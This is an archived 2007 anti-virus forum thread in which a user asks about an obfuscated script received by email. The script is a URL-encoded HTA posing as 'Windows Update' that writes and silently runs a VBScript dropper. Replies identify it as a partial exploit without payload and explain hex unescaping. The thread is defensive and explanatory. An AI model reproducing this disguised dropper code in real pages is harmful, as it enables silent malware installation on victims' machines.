can anyone tell me what this is plz?

Discussion in 'Anti-Virus' started by George Orwell, May 2, 2007.

  1. got this via email today and i can't make out what it is.



    <script>
    <!--
    document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3EWindows%20Update%3C/TITLE%3E%0D%0A%3CHTA%3AAPPLICATION%20ID%3D%22Q%22%20APPLICATIONNAME%3D%22Q%22%20BORDER%3D%22none%22%20BORDERSTYLE%3D%22normal%22%20CAPTION%3D%22no%22%20ICON%3D%22%22%20CONTEXTMENU%3D%22no%22%20MAXIMIZEBUTTON%3D%22no%22%20MINIMIZEBUTTON%3D%22no%22%20SHOWINTASKBAR%3D%22no%22%20SINGLEINSTANCE%3D%22no%22%20SYSMENU%3D%22no%22%20VERSION%3D%221.0%22%20WINDOWSTATE%3D%22minimize%22/%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0D%0AMyFile%20%3D%20%22%27%2CszHTAVbsName%2C%27%22%0D%0ASet%20FSO%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0D%0ASet%20TSO%20%3D%20FSO.CreateTextFile%28MyFile%2C%20True%29%0D%0ATSO.write%20%22dim%20filesys%2C%20filetxt%2C%20getname%2C%20path%2C%20textfile%2C%20i%22%20%26%20vbcrlf%0D%0ATSO.write%20%22textfile%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filesys%20%3D%20CreateObject%28%22%22Scripting.FileSystemObject%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filetxt%20%3D%20filesys.CreateTextFile%28textfile%2C%20True%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22getname%20%3D%20filesys.GetFileName%28path%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20a%22%20%26%20vbcrlf%0D%0ATSO.write%20%22a%3DArray%28%27%2C0%27%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22for%20i%3D0%20to%20%27%2C0%27%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Write%28chr%28a%28i%29%29%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22next%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Close%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20z%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20zz%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Const%20ForReading%20%3D%201%2C%20ForWriting%20%3D%202%2C%20ForAppending%20%3D%203%22%20%26%20vbcrlf%0D%0ATSO.write%20%22const%20RemoteExe%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22set%20zz%20%3D%20wscript.createobject%28%22%22wscript.shell%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22z%20%3D%20zz.run%20%28%22%22%27%2CszHTAFileName%2C%27%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22wscript.quit%22%20%26%20vbcrlf%0D%0ASet%20TSO%20%3D%20Nothing%0D%0ASet%20FSO%20%3D%20Nothing%0D%0ADim%20WshShell%0D%0ASet%20WshShell%20%3D%20CreateObject%28%22WScript.Shell%22%29%0D%0AWshShell.Run%20%22%27%2CszHTAVbsName%2C%27%22%2C%200%2C%20false%0D%0A%3C/SCRIPT%3E%0D%0A%3Cscript%3Ewindow.close%28%29%3C/script%3E%0D%0A%3C/HEAD%3E%0D%0A%3C/HTML%3E"));
    //-->
    </script>
     
    George Orwell, May 2, 2007
    #1
    1. Advertisements

  2. George Orwell

    Ant Guest

    Part of a VBScript HTA exploit with no payload. Where's the rest of it?
     
    Ant, May 2, 2007
    #2
    1. Advertisements

  3. George Orwell

    ddcc Guest

    How can this be manually "decrypted"?
     
    ddcc, May 3, 2007
    #3
  4. George Orwell

    Ant Guest

    I don't know why you'd want to do it manually other than for
    educational purposes. Normally you'd write a script or use a suitable
    tool to unescape the hex codes, but here goes.

    Where you see a sequence of characters starting with "%" and
    followed by two more in the range 0-9 or A-F (upper or lower case),
    remove the "%" and treat them as a 2-digit hexadecimal number. This
    number marks the position (0-127) in the ASCII character set where
    the required symbol or control character is found.

    for example:

    %3C is hex 3c, which is position 60 (decimal), which is "<".

    %0D%0A is positions 13 and 10, which represent a carriage-return/
    line-feed pair used to indicate a new line in plain-text documents
    on Microsoft systems and Internet messages.

    So the sequence:

    %3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3E

    Decodes to:

    <HTML><HEAD>
    <TITLE>
     
    Ant, May 3, 2007
    #4
  5. George Orwell

    ddcc Guest

    Thanks!
     
    ddcc, May 4, 2007
    #5
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.